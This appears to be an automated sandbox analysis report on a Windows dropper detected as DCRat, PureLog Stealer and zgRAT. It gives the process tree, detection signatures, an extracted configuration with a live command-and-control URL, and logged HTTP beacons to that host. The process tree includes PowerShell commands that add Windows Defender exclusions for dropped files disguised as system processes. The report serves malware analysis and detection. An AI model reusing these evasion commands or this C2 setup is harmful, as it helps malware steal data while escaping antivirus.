Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QH67JSdZWl.exe

Overview

General Information

Sample name:QH67JSdZWl.exe
renamed because original name is a hash value
Original sample name:c8228b107dfad48c1a7de8147fa1f6e4.exe
Analysis ID:1582993
MD5:c8228b107dfad48c1a7de8147fa1f6e4
SHA1:7f6d1d3c48d891cccc4b0dd57504db216ac681a8
SHA256:8d0c8954abeaa3c75c922544e9798171de09868a3a1f9300e07465672ada3da4
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • QH67JSdZWl.exe (PID: 1620 cmdline: "C:\Users\user\Desktop\QH67JSdZWl.exe" MD5: C8228B107DFAD48C1A7DE8147FA1F6E4)
    • f5Mb10zb.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe" MD5: FEB773E3FB046E0D1F39450C703492CA)
      • wscript.exe (PID: 6288 cmdline: "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • agentFont.exe (PID: 2120 cmdline: "C:\mshypercomponentSavesdll/agentFont.exe" MD5: 0D30B2D3FD8DB7AE5EDC0455DA8DC8E9)
            • powershell.exe (PID: 7284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7292 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7308 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 8172 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • powershell.exe (PID: 7328 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7352 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7940 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 8064 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • agentFont.exe (PID: 1136 cmdline: "C:\mshypercomponentSavesdll\agentFont.exe" MD5: 0D30B2D3FD8DB7AE5EDC0455DA8DC8E9)
  • agentFont.exe (PID: 7696 cmdline: C:\mshypercomponentSavesdll\agentFont.exe MD5: 0D30B2D3FD8DB7AE5EDC0455DA8DC8E9)
  • agentFont.exe (PID: 7832 cmdline: C:\mshypercomponentSavesdll\agentFont.exe MD5: 0D30B2D3FD8DB7AE5EDC0455DA8DC8E9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://487997cm.renyash.top/VideoFlowergeneratorTestpublic", "MUTEX": "DCR_MUTEX-zJ96YeHxtQ4bDVXj3fVS"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Recovery\ApplicationFrameHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\ApplicationFrameHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\mshypercomponentSavesdll\agentFont.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 9 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000005.00000000.1686628391.0000000000F32000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 1 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      5.0.agentFont.exe.f30000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        5.0.agentFont.exe.f30000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          1.3.f5Mb10zb.exe.65e7104.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            1.3.f5Mb10zb.exe.65e7104.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              1.3.f5Mb10zb.exe.65e7104.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                Click to see the 5 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Files With System Process Name In Unsuspected Locations
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\mshypercomponentSavesdll\agentFont.exe, ProcessId: 2120, TargetFilename: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\mshypercomponentSavesdll/agentFont.exe", ParentImage: C:\mshypercomponentSavesdll\agentFont.exe, ParentProcessId: 2120, ParentProcessName: agentFont.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', ProcessId: 7284, ProcessName: powershell.exe
                                Sigma detected: Powershell Defender Exclusion
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\mshypercomponentSavesdll/agentFont.exe", ParentImage: C:\mshypercomponentSavesdll\agentFont.exe, ParentProcessId: 2120, ParentProcessName: agentFont.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', ProcessId: 7284, ProcessName: powershell.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, ParentProcessId: 3064, ParentProcessName: f5Mb10zb.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" , ProcessId: 6288, ProcessName: wscript.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\mshypercomponentSavesdll/agentFont.exe", ParentImage: C:\mshypercomponentSavesdll\agentFont.exe, ParentProcessId: 2120, ParentProcessName: agentFont.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', ProcessId: 7284, ProcessName: powershell.exe

                                Suricata Signatures

                                No Suricata rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: http://487997cm.renyash.top/VideoFlowergeneratorTestpublic.phpAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\z0MvDYgz73.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\mshypercomponentSavesdll\agentFont.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\Recovery\ApplicationFrameHost.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                Found malware configuration
                                Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://487997cm.renyash.top/VideoFlowergeneratorTestpublic", "MUTEX": "DCR_MUTEX-zJ96YeHxtQ4bDVXj3fVS"}
                                Multi AV Scanner detection for dropped file
                                Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exeReversingLabs: Detection: 82%
                                Source: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exeReversingLabs: Detection: 82%
                                Source: C:\Recovery\ApplicationFrameHost.exeReversingLabs: Detection: 82%
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeReversingLabs: Detection: 82%
                                Source: C:\Users\user\Desktop\HOfmkikL.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\HhjUFBqv.logReversingLabs: Detection: 25%
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeReversingLabs: Detection: 82%
                                Source: C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exeReversingLabs: Detection: 82%
                                Source: C:\mshypercomponentSavesdll\agentFont.exeReversingLabs: Detection: 82%
                                Multi AV Scanner detection for submitted file
                                Source: QH67JSdZWl.exeVirustotal: Detection: 44%Perma Link
                                Source: QH67JSdZWl.exeReversingLabs: Detection: 60%
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\Desktop\cvxIvGPF.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\kZFyeAfm.logJoe Sandbox ML: detected
                                Source: C:\mshypercomponentSavesdll\agentFont.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\AnJfWYZZ.logJoe Sandbox ML: detected
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exeJoe Sandbox ML: detected
                                Source: C:\Recovery\ApplicationFrameHost.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\rEqPmwUs.logJoe Sandbox ML: detected
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: QH67JSdZWl.exeJoe Sandbox ML: detected
                                Sample uses string decryption to hide its real strings
                                Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"}}
                                Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-zJ96YeHxtQ4bDVXj3fVS","0","hidraceflal","1","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://487997cm.renyash.top/","VideoFlowergeneratorTestpublic"]]
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exeJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\9e8d7a4ca61bd9Jump to behavior
                                Source: QH67JSdZWl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe, 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp, f5Mb10zb.exe, 00000001.00000000.1667497208.0000000000753000.00000002.00000001.01000000.00000009.sdmp, f5Mb10zb.exe, 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe, 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe.0.dr
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, mf04Loader.dll.0.dr
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, mf04Loader.dll.0.dr
                                Source: Binary string: D:\Projects\WinRAR\SFX\build\sfxrar64\Release\sfxrar.pdb source: QH67JSdZWl.exe
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1A9A0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,WaitForInputIdle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F1A9A0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0341C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F0341C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F2EBC0 FindFirstFileExA,0_2_00007FF7B8F2EBC0
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0072A69B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0073C220
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\RarSFX0\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\Jump to behavior

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                barindex
                                Uses ping.exe to check the status of other devices and networks
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: Joe Sandbox ViewASN Name: PREVIDER-ASNL PREVIDER-ASNL
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 384Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1340Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
